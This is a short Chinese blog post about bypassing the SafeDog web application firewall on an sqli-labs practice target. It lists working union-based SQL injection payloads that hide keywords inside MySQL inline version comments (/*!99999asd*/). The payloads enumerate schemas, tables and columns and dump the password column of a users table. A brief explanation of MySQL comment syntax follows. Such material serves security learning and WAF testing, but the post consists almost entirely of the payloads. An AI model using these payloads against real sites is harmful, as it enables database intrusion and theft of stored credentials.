一次安全狗绕过

最新推荐文章于 2024-02-16 20:00:00 发布

winning_cheems

最新推荐文章于 2024-02-16 20:00:00 发布

阅读量235

点赞数

本文链接：https://blog.csdn.net/weixin_45490166/article/details/118763063

版权

http://115.159.97.35/sqli-labs-master/Less-1/?id=1
安全狗绕过

参考 https://www.cnblogs.com/Yang34/p/12055052.html

?id=1' order/*!99999asd*/by 3 --+

?id=-1'union/*!99999test*/select 1,2,/*!99999test*/group_concat(schema_name) from information_schema.schemata--+

?id=-1'union/*!99999test*/select 1,2,/*!99999test*/group_concat(table_name) from information_schema.tables where table_schema='security'--+

?id=-1'union/*!99999test*/select 1,2,/*!99999test*/group_concat(column_name) from information_schema.columns where table_name='users'--+

?id=-1'union/*!99999asd*/select 1,2,/*!99999asd*/group_concat(password) from security.users --+

在这里插入图片描述

所以这个 /*!99999asd*/ 到底是个啥？

注释
　　1、单行注释，#后面直接加内容 ；单行注释，--后面必须要加空格 ；
　　2、多行注释，/**/中间可以跨行；
         3、内联注入， 内联注释是MySQL数据库为了保持与其他数据库兼容，特意新添加的功能。 
                  
　　        为了避免从MySQL中导出的SQL语句不能被其他数据库使用，它把一些 MySQL特有的语句放在 /*! ... */ 中，
　　        
　　        这些语句在不兼容的数据库中使用时便 不会执行。而MySQL自身却能识别、执行。

winning_cheems

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
一次安全狗绕过

http://115.159.97.35/sqli-labs-master/Less-1/?id=1安全狗绕过参考 https://www.cnblogs.com/Yang34/p/12055052.html?id=1' order/*!99999asd*/by 3 --+?id=-1'union/*!99999test*/select 1,2,/*!99999test*/group_concat(schema_name) from information_schema.schemata--+
复制链接

扫一扫